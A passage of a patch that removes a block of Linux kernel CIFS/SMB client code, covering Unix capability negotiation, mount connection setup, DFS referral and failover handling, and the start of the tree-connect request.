+-		if (cap & CIFS_UNIX_TRANSPORT_ENCRYPTION_MANDATORY_CAP)
+-			cifs_dbg(VFS, "per-share encryption not supported yet\n");
+-
+-		cap &= CIFS_UNIX_CAP_MASK;
+-		if (ctx && ctx->no_psx_acl)
+-			cap &= ~CIFS_UNIX_POSIX_ACL_CAP;
+-		else if (CIFS_UNIX_POSIX_ACL_CAP & cap) {
+-			cifs_dbg(FYI, "negotiated posix acl support\n");
+-			if (cifs_sb)
+-				cifs_sb->mnt_cifs_flags |=
+-					CIFS_MOUNT_POSIXACL;
+-		}
+-
+-		if (ctx && ctx->posix_paths == 0)
+-			cap &= ~CIFS_UNIX_POSIX_PATHNAMES_CAP;
+-		else if (cap & CIFS_UNIX_POSIX_PATHNAMES_CAP) {
+-			cifs_dbg(FYI, "negotiate posix pathnames\n");
+-			if (cifs_sb)
+-				cifs_sb->mnt_cifs_flags |=
+-					CIFS_MOUNT_POSIX_PATHS;
+-		}
+-
+-		cifs_dbg(FYI, "Negotiate caps 0x%x\n", (int)cap);
+-#ifdef CONFIG_CIFS_DEBUG2
+-		if (cap & CIFS_UNIX_FCNTL_CAP)
+-			cifs_dbg(FYI, "FCNTL cap\n");
+-		if (cap & CIFS_UNIX_EXTATTR_CAP)
+-			cifs_dbg(FYI, "EXTATTR cap\n");
+-		if (cap & CIFS_UNIX_POSIX_PATHNAMES_CAP)
+-			cifs_dbg(FYI, "POSIX path cap\n");
+-		if (cap & CIFS_UNIX_XATTR_CAP)
+-			cifs_dbg(FYI, "XATTR cap\n");
+-		if (cap & CIFS_UNIX_POSIX_ACL_CAP)
+-			cifs_dbg(FYI, "POSIX ACL cap\n");
+-		if (cap & CIFS_UNIX_LARGE_READ_CAP)
+-			cifs_dbg(FYI, "very large read cap\n");
+-		if (cap & CIFS_UNIX_LARGE_WRITE_CAP)
+-			cifs_dbg(FYI, "very large write cap\n");
+-		if (cap & CIFS_UNIX_TRANSPORT_ENCRYPTION_CAP)
+-			cifs_dbg(FYI, "transport encryption cap\n");
+-		if (cap & CIFS_UNIX_TRANSPORT_ENCRYPTION_MANDATORY_CAP)
+-			cifs_dbg(FYI, "mandatory transport encryption cap\n");
+-#endif /* CIFS_DEBUG2 */
+-		if (CIFSSMBSetFSUnixInfo(xid, tcon, cap)) {
+-			if (ctx == NULL)
+-				cifs_dbg(FYI, "resetting capabilities failed\n");
+-			else
+-				cifs_dbg(VFS, "Negotiating Unix capabilities with the server failed. Consider mounting with the Unix Extensions disabled if problems are found by specifying the nounix mount option.\n");
+-
+-		}
+-	}
+-}
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-
+-int cifs_setup_cifs_sb(struct cifs_sb_info *cifs_sb)
+-{
+-	struct smb3_fs_context *ctx = cifs_sb->ctx;
+-
+-	INIT_DELAYED_WORK(&cifs_sb->prune_tlinks, cifs_prune_tlinks);
+-
+-	spin_lock_init(&cifs_sb->tlink_tree_lock);
+-	cifs_sb->tlink_tree = RB_ROOT;
+-
+-	cifs_dbg(FYI, "file mode: %04ho  dir mode: %04ho\n",
+-		 ctx->file_mode, ctx->dir_mode);
+-
+-	/* this is needed for ASCII cp to Unicode converts */
+-	if (ctx->iocharset == NULL) {
+-		/* load_nls_default cannot return null */
+-		cifs_sb->local_nls = load_nls_default();
+-	} else {
+-		cifs_sb->local_nls = load_nls(ctx->iocharset);
+-		if (cifs_sb->local_nls == NULL) {
+-			cifs_dbg(VFS, "CIFS mount error: iocharset %s not found\n",
+-				 ctx->iocharset);
+-			return -ELIBACC;
+-		}
+-	}
+-	ctx->local_nls = cifs_sb->local_nls;
+-
+-	smb3_update_mnt_flags(cifs_sb);
+-
+-	if (ctx->direct_io)
+-		cifs_dbg(FYI, "mounting share using direct i/o\n");
+-	if (ctx->cache_ro) {
+-		cifs_dbg(VFS, "mounting share with read only caching. Ensure that the share will not be modified while in use.\n");
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_RO_CACHE;
+-	} else if (ctx->cache_rw) {
+-		cifs_dbg(VFS, "mounting share in single client RW caching mode. Ensure that no other systems will be accessing the share.\n");
+-		cifs_sb->mnt_cifs_flags |= (CIFS_MOUNT_RO_CACHE |
+-					    CIFS_MOUNT_RW_CACHE);
+-	}
+-
+-	if ((ctx->cifs_acl) && (ctx->dynperm))
+-		cifs_dbg(VFS, "mount option dynperm ignored if cifsacl mount option supported\n");
+-
+-	if (ctx->prepath) {
+-		cifs_sb->prepath = kstrdup(ctx->prepath, GFP_KERNEL);
+-		if (cifs_sb->prepath == NULL)
+-			return -ENOMEM;
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
+-	}
+-
+-	return 0;
+-}
+-
+-/* Release all succeed connections */
+-static inline void mount_put_conns(struct mount_ctx *mnt_ctx)
+-{
+-	int rc = 0;
+-
+-	if (mnt_ctx->tcon)
+-		cifs_put_tcon(mnt_ctx->tcon);
+-	else if (mnt_ctx->ses)
+-		cifs_put_smb_ses(mnt_ctx->ses);
+-	else if (mnt_ctx->server)
+-		cifs_put_tcp_session(mnt_ctx->server, 0);
+-	mnt_ctx->cifs_sb->mnt_cifs_flags &= ~CIFS_MOUNT_POSIX_PATHS;
+-	free_xid(mnt_ctx->xid);
+-}
+-
+-/* Get connections for tcp, ses and tcon */
+-static int mount_get_conns(struct mount_ctx *mnt_ctx)
+-{
+-	int rc = 0;
+-	struct TCP_Server_Info *server = NULL;
+-	struct cifs_ses *ses = NULL;
+-	struct cifs_tcon *tcon = NULL;
+-	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+-	unsigned int xid;
+-
+-	xid = get_xid();
+-
+-	/* get a reference to a tcp session */
+-	server = cifs_get_tcp_session(ctx, NULL);
+-	if (IS_ERR(server)) {
+-		rc = PTR_ERR(server);
+-		server = NULL;
+-		goto out;
+-	}
+-
+-	/* get a reference to a SMB session */
+-	ses = cifs_get_smb_ses(server, ctx);
+-	if (IS_ERR(ses)) {
+-		rc = PTR_ERR(ses);
+-		ses = NULL;
+-		goto out;
+-	}
+-
+-	if ((ctx->persistent == true) && (!(ses->server->capabilities &
+-					    SMB2_GLOBAL_CAP_PERSISTENT_HANDLES))) {
+-		cifs_server_dbg(VFS, "persistent handles not supported by server\n");
+-		rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	/* search for existing tcon to this server share */
+-	tcon = cifs_get_tcon(ses, ctx);
+-	if (IS_ERR(tcon)) {
+-		rc = PTR_ERR(tcon);
+-		tcon = NULL;
+-		goto out;
+-	}
+-
+-	/* if new SMB3.11 POSIX extensions are supported do not remap / and \ */
+-	if (tcon->posix_extensions)
+-		cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_POSIX_PATHS;
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	/* tell server which Unix caps we support */
+-	if (cap_unix(tcon->ses)) {
+-		/*
+-		 * reset of caps checks mount to see if unix extensions disabled
+-		 * for just this mount.
+-		 */
+-		reset_cifs_unix_caps(xid, tcon, cifs_sb, ctx);
+-		spin_lock(&tcon->ses->server->srv_lock);
+-		if ((tcon->ses->server->tcpStatus == CifsNeedReconnect) &&
+-		    (le64_to_cpu(tcon->fsUnixInfo.Capability) &
+-		     CIFS_UNIX_TRANSPORT_ENCRYPTION_MANDATORY_CAP)) {
+-			spin_unlock(&tcon->ses->server->srv_lock);
+-			rc = -EACCES;
+-			goto out;
+-		}
+-		spin_unlock(&tcon->ses->server->srv_lock);
+-	} else
+-#endif /* CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-		tcon->unix_ext = 0; /* server does not support them */
+-
+-	/* do not care if a following call succeed - informational */
+-	if (!tcon->pipe && server->ops->qfs_tcon) {
+-		server->ops->qfs_tcon(xid, tcon, cifs_sb);
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RO_CACHE) {
+-			if (tcon->fsDevInfo.DeviceCharacteristics &
+-			    cpu_to_le32(FILE_READ_ONLY_DEVICE))
+-				cifs_dbg(VFS, "mounted to read only share\n");
+-			else if ((cifs_sb->mnt_cifs_flags &
+-				  CIFS_MOUNT_RW_CACHE) == 0)
+-				cifs_dbg(VFS, "read only mount of RW share\n");
+-			/* no need to log a RW mount of a typical RW share */
+-		}
+-	}
+-
+-	/*
+-	 * Clamp the rsize/wsize mount arguments if they are too big for the server
+-	 * and set the rsize/wsize to the negotiated values if not passed in by
+-	 * the user on mount
+-	 */
+-	if ((cifs_sb->ctx->wsize == 0) ||
+-	    (cifs_sb->ctx->wsize > server->ops->negotiate_wsize(tcon, ctx)))
+-		cifs_sb->ctx->wsize = server->ops->negotiate_wsize(tcon, ctx);
+-	if ((cifs_sb->ctx->rsize == 0) ||
+-	    (cifs_sb->ctx->rsize > server->ops->negotiate_rsize(tcon, ctx)))
+-		cifs_sb->ctx->rsize = server->ops->negotiate_rsize(tcon, ctx);
+-
+-	/*
+-	 * The cookie is initialized from volume info returned above.
+-	 * Inside cifs_fscache_get_super_cookie it checks
+-	 * that we do not get super cookie twice.
+-	 */
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_FSCACHE)
+-		cifs_fscache_get_super_cookie(tcon);
+-
+-out:
+-	mnt_ctx->server = server;
+-	mnt_ctx->ses = ses;
+-	mnt_ctx->tcon = tcon;
+-	mnt_ctx->xid = xid;
+-
+-	return rc;
+-}
+-
+-static int mount_setup_tlink(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses,
+-			     struct cifs_tcon *tcon)
+-{
+-	struct tcon_link *tlink;
+-
+-	/* hang the tcon off of the superblock */
+-	tlink = kzalloc(sizeof(*tlink), GFP_KERNEL);
+-	if (tlink == NULL)
+-		return -ENOMEM;
+-
+-	tlink->tl_uid = ses->linux_uid;
+-	tlink->tl_tcon = tcon;
+-	tlink->tl_time = jiffies;
+-	set_bit(TCON_LINK_MASTER, &tlink->tl_flags);
+-	set_bit(TCON_LINK_IN_TREE, &tlink->tl_flags);
+-
+-	cifs_sb->master_tlink = tlink;
+-	spin_lock(&cifs_sb->tlink_tree_lock);
+-	tlink_rb_insert(&cifs_sb->tlink_tree, tlink);
+-	spin_unlock(&cifs_sb->tlink_tree_lock);
+-
+-	queue_delayed_work(cifsiod_wq, &cifs_sb->prune_tlinks,
+-				TLINK_IDLE_EXPIRE);
+-	return 0;
+-}
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-/* Get unique dfs connections */
+-static int mount_get_dfs_conns(struct mount_ctx *mnt_ctx)
+-{
+-	int rc;
+-
+-	mnt_ctx->fs_ctx->nosharesock = true;
+-	rc = mount_get_conns(mnt_ctx);
+-	if (mnt_ctx->server) {
+-		cifs_dbg(FYI, "%s: marking tcp session as a dfs connection\n", __func__);
+-		spin_lock(&mnt_ctx->server->srv_lock);
+-		mnt_ctx->server->is_dfs_conn = true;
+-		spin_unlock(&mnt_ctx->server->srv_lock);
+-	}
+-	return rc;
+-}
+-
+-/*
+- * cifs_build_path_to_root returns full path to root when we do not have an
+- * existing connection (tcon)
+- */
+-static char *
+-build_unc_path_to_root(const struct smb3_fs_context *ctx,
+-		       const struct cifs_sb_info *cifs_sb, bool useppath)
+-{
+-	char *full_path, *pos;
+-	unsigned int pplen = useppath && ctx->prepath ?
+-		strlen(ctx->prepath) + 1 : 0;
+-	unsigned int unc_len = strnlen(ctx->UNC, MAX_TREE_SIZE + 1);
+-
+-	if (unc_len > MAX_TREE_SIZE)
+-		return ERR_PTR(-EINVAL);
+-
+-	full_path = kmalloc(unc_len + pplen + 1, GFP_KERNEL);
+-	if (full_path == NULL)
+-		return ERR_PTR(-ENOMEM);
+-
+-	memcpy(full_path, ctx->UNC, unc_len);
+-	pos = full_path + unc_len;
+-
+-	if (pplen) {
+-		*pos = CIFS_DIR_SEP(cifs_sb);
+-		memcpy(pos + 1, ctx->prepath, pplen);
+-		pos += pplen;
+-	}
+-
+-	*pos = '\0'; /* add trailing null */
+-	convert_delimiter(full_path, CIFS_DIR_SEP(cifs_sb));
+-	cifs_dbg(FYI, "%s: full_path=%s\n", __func__, full_path);
+-	return full_path;
+-}
+-
+-/*
+- * expand_dfs_referral - Update cifs_sb from dfs referral path
+- *
+- * cifs_sb->ctx->mount_options will be (re-)allocated to a string containing updated options for the
+- * submount.  Otherwise it will be left untouched.
+- */
+-static int expand_dfs_referral(struct mount_ctx *mnt_ctx, const char *full_path,
+-			       struct dfs_info3_param *referral)
+-{
+-	int rc;
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+-	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+-	char *fake_devname = NULL, *mdata = NULL;
+-
+-	mdata = cifs_compose_mount_options(cifs_sb->ctx->mount_options, full_path + 1, referral,
+-					   &fake_devname);
+-	if (IS_ERR(mdata)) {
+-		rc = PTR_ERR(mdata);
+-		mdata = NULL;
+-	} else {
+-		/*
+-		 * We can not clear out the whole structure since we no longer have an explicit
+-		 * function to parse a mount-string. Instead we need to clear out the individual
+-		 * fields that are no longer valid.
+-		 */
+-		kfree(ctx->prepath);
+-		ctx->prepath = NULL;
+-		rc = cifs_setup_volume_info(ctx, mdata, fake_devname);
+-	}
+-	kfree(fake_devname);
+-	kfree(cifs_sb->ctx->mount_options);
+-	cifs_sb->ctx->mount_options = mdata;
+-
+-	return rc;
+-}
+-#endif
+-
+-/* TODO: all callers to this are broken. We are not parsing mount_options here
+- * we should pass a clone of the original context?
+- */
+-int
+-cifs_setup_volume_info(struct smb3_fs_context *ctx, const char *mntopts, const char *devname)
+-{
+-	int rc;
+-
+-	if (devname) {
+-		cifs_dbg(FYI, "%s: devname=%s\n", __func__, devname);
+-		rc = smb3_parse_devname(devname, ctx);
+-		if (rc) {
+-			cifs_dbg(VFS, "%s: failed to parse %s: %d\n", __func__, devname, rc);
+-			return rc;
+-		}
+-	}
+-
+-	if (mntopts) {
+-		char *ip;
+-
+-		rc = smb3_parse_opt(mntopts, "ip", &ip);
+-		if (rc) {
+-			cifs_dbg(VFS, "%s: failed to parse ip options: %d\n", __func__, rc);
+-			return rc;
+-		}
+-
+-		rc = cifs_convert_address((struct sockaddr *)&ctx->dstaddr, ip, strlen(ip));
+-		kfree(ip);
+-		if (!rc) {
+-			cifs_dbg(VFS, "%s: failed to convert ip address\n", __func__);
+-			return -EINVAL;
+-		}
+-	}
+-
+-	if (ctx->nullauth) {
+-		cifs_dbg(FYI, "Anonymous login\n");
+-		kfree(ctx->username);
+-		ctx->username = NULL;
+-	} else if (ctx->username) {
+-		/* BB fixme parse for domain name here */
+-		cifs_dbg(FYI, "Username: %s\n", ctx->username);
+-	} else {
+-		cifs_dbg(VFS, "No username specified\n");
+-	/* In userspace mount helper we can get user name from alternate
+-	   locations such as env variables and files on disk */
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-static int
+-cifs_are_all_path_components_accessible(struct TCP_Server_Info *server,
+-					unsigned int xid,
+-					struct cifs_tcon *tcon,
+-					struct cifs_sb_info *cifs_sb,
+-					char *full_path,
+-					int added_treename)
+-{
+-	int rc;
+-	char *s;
+-	char sep, tmp;
+-	int skip = added_treename ? 1 : 0;
+-
+-	sep = CIFS_DIR_SEP(cifs_sb);
+-	s = full_path;
+-
+-	rc = server->ops->is_path_accessible(xid, tcon, cifs_sb, "");
+-	while (rc == 0) {
+-		/* skip separators */
+-		while (*s == sep)
+-			s++;
+-		if (!*s)
+-			break;
+-		/* next separator */
+-		while (*s && *s != sep)
+-			s++;
+-		/*
+-		 * if the treename is added, we then have to skip the first
+-		 * part within the separators
+-		 */
+-		if (skip) {
+-			skip = 0;
+-			continue;
+-		}
+-		/*
+-		 * temporarily null-terminate the path at the end of
+-		 * the current component
+-		 */
+-		tmp = *s;
+-		*s = 0;
+-		rc = server->ops->is_path_accessible(xid, tcon, cifs_sb,
+-						     full_path);
+-		*s = tmp;
+-	}
+-	return rc;
+-}
+-
+-/*
+- * Check if path is remote (i.e. a DFS share).
+- *
+- * Return -EREMOTE if it is, otherwise 0 or -errno.
+- */
+-static int is_path_remote(struct mount_ctx *mnt_ctx)
+-{
+-	int rc;
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+-	struct TCP_Server_Info *server = mnt_ctx->server;
+-	unsigned int xid = mnt_ctx->xid;
+-	struct cifs_tcon *tcon = mnt_ctx->tcon;
+-	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+-	char *full_path;
+-
+-	if (!server->ops->is_path_accessible)
+-		return -EOPNOTSUPP;
+-
+-	/*
+-	 * cifs_build_path_to_root works only when we have a valid tcon
+-	 */
+-	full_path = cifs_build_path_to_root(ctx, cifs_sb, tcon,
+-					    tcon->Flags & SMB_SHARE_IS_IN_DFS);
+-	if (full_path == NULL)
+-		return -ENOMEM;
+-
+-	cifs_dbg(FYI, "%s: full_path: %s\n", __func__, full_path);
+-
+-	rc = server->ops->is_path_accessible(xid, tcon, cifs_sb,
+-					     full_path);
+-	if (rc != 0 && rc != -EREMOTE)
+-		goto out;
+-
+-	if (rc != -EREMOTE) {
+-		rc = cifs_are_all_path_components_accessible(server, xid, tcon,
+-			cifs_sb, full_path, tcon->Flags & SMB_SHARE_IS_IN_DFS);
+-		if (rc != 0) {
+-			cifs_server_dbg(VFS, "cannot query dirs between root and final path, enabling CIFS_MOUNT_USE_PREFIX_PATH\n");
+-			cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
+-			rc = 0;
+-		}
+-	}
+-
+-out:
+-	kfree(full_path);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-static void set_root_ses(struct mount_ctx *mnt_ctx)
+-{
+-	if (mnt_ctx->ses) {
+-		spin_lock(&cifs_tcp_ses_lock);
+-		mnt_ctx->ses->ses_count++;
+-		spin_unlock(&cifs_tcp_ses_lock);
+-		dfs_cache_add_refsrv_session(&mnt_ctx->mount_id, mnt_ctx->ses);
+-	}
+-	mnt_ctx->root_ses = mnt_ctx->ses;
+-}
+-
+-static int is_dfs_mount(struct mount_ctx *mnt_ctx, bool *isdfs, struct dfs_cache_tgt_list *root_tl)
+-{
+-	int rc;
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+-	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+-
+-	*isdfs = true;
+-
+-	rc = mount_get_conns(mnt_ctx);
+-	/*
+-	 * If called with 'nodfs' mount option, then skip DFS resolving.  Otherwise unconditionally
+-	 * try to get an DFS referral (even cached) to determine whether it is an DFS mount.
+-	 *
+-	 * Skip prefix path to provide support for DFS referrals from w2k8 servers which don't seem
+-	 * to respond with PATH_NOT_COVERED to requests that include the prefix.
+-	 */
+-	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_DFS) ||
+-	    dfs_cache_find(mnt_ctx->xid, mnt_ctx->ses, cifs_sb->local_nls, cifs_remap(cifs_sb),
+-			   ctx->UNC + 1, NULL, root_tl)) {
+-		if (rc)
+-			return rc;
+-		/* Check if it is fully accessible and then mount it */
+-		rc = is_path_remote(mnt_ctx);
+-		if (!rc)
+-			*isdfs = false;
+-		else if (rc != -EREMOTE)
+-			return rc;
+-	}
+-	return 0;
+-}
+-
+-static int connect_dfs_target(struct mount_ctx *mnt_ctx, const char *full_path,
+-			      const char *ref_path, struct dfs_cache_tgt_iterator *tit)
+-{
+-	int rc;
+-	struct dfs_info3_param ref = {};
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+-	char *oldmnt = cifs_sb->ctx->mount_options;
+-
+-	cifs_dbg(FYI, "%s: full_path=%s ref_path=%s target=%s\n", __func__, full_path, ref_path,
+-		 dfs_cache_get_tgt_name(tit));
+-
+-	rc = dfs_cache_get_tgt_referral(ref_path, tit, &ref);
+-	if (rc)
+-		goto out;
+-
+-	rc = expand_dfs_referral(mnt_ctx, full_path, &ref);
+-	if (rc)
+-		goto out;
+-
+-	/* Connect to new target only if we were redirected (e.g. mount options changed) */
+-	if (oldmnt != cifs_sb->ctx->mount_options) {
+-		mount_put_conns(mnt_ctx);
+-		rc = mount_get_dfs_conns(mnt_ctx);
+-	}
+-	if (!rc) {
+-		if (cifs_is_referral_server(mnt_ctx->tcon, &ref))
+-			set_root_ses(mnt_ctx);
+-		rc = dfs_cache_update_tgthint(mnt_ctx->xid, mnt_ctx->root_ses, cifs_sb->local_nls,
+-					      cifs_remap(cifs_sb), ref_path, tit);
+-	}
+-
+-out:
+-	free_dfs_info_param(&ref);
+-	return rc;
+-}
+-
+-static int connect_dfs_root(struct mount_ctx *mnt_ctx, struct dfs_cache_tgt_list *root_tl)
+-{
+-	int rc;
+-	char *full_path;
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+-	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+-	struct dfs_cache_tgt_iterator *tit;
+-
+-	/* Put initial connections as they might be shared with other mounts.  We need unique dfs
+-	 * connections per mount to properly failover, so mount_get_dfs_conns() must be used from
+-	 * now on.
+-	 */
+-	mount_put_conns(mnt_ctx);
+-	mount_get_dfs_conns(mnt_ctx);
+-	set_root_ses(mnt_ctx);
+-
+-	full_path = build_unc_path_to_root(ctx, cifs_sb, true);
+-	if (IS_ERR(full_path))
+-		return PTR_ERR(full_path);
+-
+-	mnt_ctx->origin_fullpath = dfs_cache_canonical_path(ctx->UNC, cifs_sb->local_nls,
+-							    cifs_remap(cifs_sb));
+-	if (IS_ERR(mnt_ctx->origin_fullpath)) {
+-		rc = PTR_ERR(mnt_ctx->origin_fullpath);
+-		mnt_ctx->origin_fullpath = NULL;
+-		goto out;
+-	}
+-
+-	/* Try all dfs root targets */
+-	for (rc = -ENOENT, tit = dfs_cache_get_tgt_iterator(root_tl);
+-	     tit; tit = dfs_cache_get_next_tgt(root_tl, tit)) {
+-		rc = connect_dfs_target(mnt_ctx, full_path, mnt_ctx->origin_fullpath + 1, tit);
+-		if (!rc) {
+-			mnt_ctx->leaf_fullpath = kstrdup(mnt_ctx->origin_fullpath, GFP_KERNEL);
+-			if (!mnt_ctx->leaf_fullpath)
+-				rc = -ENOMEM;
+-			break;
+-		}
+-	}
+-
+-out:
+-	kfree(full_path);
+-	return rc;
+-}
+-
+-static int __follow_dfs_link(struct mount_ctx *mnt_ctx)
+-{
+-	int rc;
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+-	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+-	char *full_path;
+-	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
+-	struct dfs_cache_tgt_iterator *tit;
+-
+-	full_path = build_unc_path_to_root(ctx, cifs_sb, true);
+-	if (IS_ERR(full_path))
+-		return PTR_ERR(full_path);
+-
+-	kfree(mnt_ctx->leaf_fullpath);
+-	mnt_ctx->leaf_fullpath = dfs_cache_canonical_path(full_path, cifs_sb->local_nls,
+-							  cifs_remap(cifs_sb));
+-	if (IS_ERR(mnt_ctx->leaf_fullpath)) {
+-		rc = PTR_ERR(mnt_ctx->leaf_fullpath);
+-		mnt_ctx->leaf_fullpath = NULL;
+-		goto out;
+-	}
+-
+-	/* Get referral from dfs link */
+-	rc = dfs_cache_find(mnt_ctx->xid, mnt_ctx->root_ses, cifs_sb->local_nls,
+-			    cifs_remap(cifs_sb), mnt_ctx->leaf_fullpath + 1, NULL, &tl);
+-	if (rc)
+-		goto out;
+-
+-	/* Try all dfs link targets.  If an I/O fails from currently connected DFS target with an
+-	 * error other than STATUS_PATH_NOT_COVERED (-EREMOTE), then retry it from other targets as
+-	 * specified in MS-DFSC "3.1.5.2 I/O Operation to Target Fails with an Error Other Than
+-	 * STATUS_PATH_NOT_COVERED."
+-	 */
+-	for (rc = -ENOENT, tit = dfs_cache_get_tgt_iterator(&tl);
+-	     tit; tit = dfs_cache_get_next_tgt(&tl, tit)) {
+-		rc = connect_dfs_target(mnt_ctx, full_path, mnt_ctx->leaf_fullpath + 1, tit);
+-		if (!rc) {
+-			rc = is_path_remote(mnt_ctx);
+-			if (!rc || rc == -EREMOTE)
+-				break;
+-		}
+-	}
+-
+-out:
+-	kfree(full_path);
+-	dfs_cache_free_tgts(&tl);
+-	return rc;
+-}
+-
+-static int follow_dfs_link(struct mount_ctx *mnt_ctx)
+-{
+-	int rc;
+-	struct cifs_sb_info *cifs_sb = mnt_ctx->cifs_sb;
+-	struct smb3_fs_context *ctx = mnt_ctx->fs_ctx;
+-	char *full_path;
+-	int num_links = 0;
+-
+-	full_path = build_unc_path_to_root(ctx, cifs_sb, true);
+-	if (IS_ERR(full_path))
+-		return PTR_ERR(full_path);
+-
+-	kfree(mnt_ctx->origin_fullpath);
+-	mnt_ctx->origin_fullpath = dfs_cache_canonical_path(full_path, cifs_sb->local_nls,
+-							    cifs_remap(cifs_sb));
+-	kfree(full_path);
+-
+-	if (IS_ERR(mnt_ctx->origin_fullpath)) {
+-		rc = PTR_ERR(mnt_ctx->origin_fullpath);
+-		mnt_ctx->origin_fullpath = NULL;
+-		return rc;
+-	}
+-
+-	do {
+-		rc = __follow_dfs_link(mnt_ctx);
+-		if (!rc || rc != -EREMOTE)
+-			break;
+-	} while (rc = -ELOOP, ++num_links < MAX_NESTED_LINKS);
+-
+-	return rc;
+-}
+-
+-/* Set up DFS referral paths for failover */
+-static void setup_server_referral_paths(struct mount_ctx *mnt_ctx)
+-{
+-	struct TCP_Server_Info *server = mnt_ctx->server;
+-
+-	mutex_lock(&server->refpath_lock);
+-	server->origin_fullpath = mnt_ctx->origin_fullpath;
+-	server->leaf_fullpath = mnt_ctx->leaf_fullpath;
+-	server->current_fullpath = mnt_ctx->leaf_fullpath;
+-	mutex_unlock(&server->refpath_lock);
+-	mnt_ctx->origin_fullpath = mnt_ctx->leaf_fullpath = NULL;
+-}
+-
+-int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
+-{
+-	int rc;
+-	struct mount_ctx mnt_ctx = { .cifs_sb = cifs_sb, .fs_ctx = ctx, };
+-	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
+-	bool isdfs;
+-
+-	rc = is_dfs_mount(&mnt_ctx, &isdfs, &tl);
+-	if (rc)
+-		goto error;
+-	if (!isdfs)
+-		goto out;
+-
+-	/* proceed as DFS mount */
+-	uuid_gen(&mnt_ctx.mount_id);
+-	rc = connect_dfs_root(&mnt_ctx, &tl);
+-	dfs_cache_free_tgts(&tl);
+-
+-	if (rc)
+-		goto error;
+-
+-	rc = is_path_remote(&mnt_ctx);
+-	if (rc)
+-		rc = follow_dfs_link(&mnt_ctx);
+-	if (rc)
+-		goto error;
+-
+-	setup_server_referral_paths(&mnt_ctx);
+-	/*
+-	 * After reconnecting to a different server, unique ids won't match anymore, so we disable
+-	 * serverino. This prevents dentry revalidation to think the dentry are stale (ESTALE).
+-	 */
+-	cifs_autodisable_serverino(cifs_sb);
+-	/*
+-	 * Force the use of prefix path to support failover on DFS paths that resolve to targets
+-	 * that have different prefix paths.
+-	 */
+-	cifs_sb->mnt_cifs_flags |= CIFS_MOUNT_USE_PREFIX_PATH;
+-	kfree(cifs_sb->prepath);
+-	cifs_sb->prepath = ctx->prepath;
+-	ctx->prepath = NULL;
+-	uuid_copy(&cifs_sb->dfs_mount_id, &mnt_ctx.mount_id);
+-
+-out:
+-	cifs_try_adding_channels(cifs_sb, mnt_ctx.ses);
+-	rc = mount_setup_tlink(cifs_sb, mnt_ctx.ses, mnt_ctx.tcon);
+-	if (rc)
+-		goto error;
+-
+-	free_xid(mnt_ctx.xid);
+-	return rc;
+-
+-error:
+-	dfs_cache_put_refsrv_sessions(&mnt_ctx.mount_id);
+-	kfree(mnt_ctx.origin_fullpath);
+-	kfree(mnt_ctx.leaf_fullpath);
+-	mount_put_conns(&mnt_ctx);
+-	return rc;
+-}
+-#else
+-int cifs_mount(struct cifs_sb_info *cifs_sb, struct smb3_fs_context *ctx)
+-{
+-	int rc = 0;
+-	struct mount_ctx mnt_ctx = { .cifs_sb = cifs_sb, .fs_ctx = ctx, };
+-
+-	rc = mount_get_conns(&mnt_ctx);
+-	if (rc)
+-		goto error;
+-
+-	if (mnt_ctx.tcon) {
+-		rc = is_path_remote(&mnt_ctx);
+-		if (rc == -EREMOTE)
+-			rc = -EOPNOTSUPP;
+-		if (rc)
+-			goto error;
+-	}
+-
+-	rc = mount_setup_tlink(cifs_sb, mnt_ctx.ses, mnt_ctx.tcon);
+-	if (rc)
+-		goto error;
+-
+-	free_xid(mnt_ctx.xid);
+-	return rc;
+-
+-error:
+-	mount_put_conns(&mnt_ctx);
+-	return rc;
+-}
+-#endif
+-
+-/*
+- * Issue a TREE_CONNECT request.
+- */
+-int
+-CIFSTCon(const unsigned int xid, struct cifs_ses *ses,
+-	 const char *tree, struct cifs_tcon *tcon,
+-	 const struct nls_table *nls_codepage)
+-{
+-	struct smb_hdr *smb_buffer;
+-	struct smb_hdr *smb_buffer_response;
+-	TCONX_REQ *pSMB;
+-	TCONX_RSP *pSMBr;
+-	unsigned char *bcc_ptr;
+-	int rc = 0;
+-	int length;
+-	__u16 bytes_left, count;
+-
+-	if (ses == NULL)
+-		return -EIO;
+-
+-	smb_buffer = cifs_buf_get();
+-	if (smb_buffer == NULL)
+-		return -ENOMEM;
+-
+-	smb_buffer_response = smb_buffer;
+-
+-	header_assemble(smb_buffer, SMB_COM_TREE_CONNECT_ANDX,
+-			NULL /*no tid */ , 4 /*wct */ );
+-
+-	smb_buffer->Mid = get_next_mid(ses->server);
+-	smb_buffer->Uid = ses->Suid;
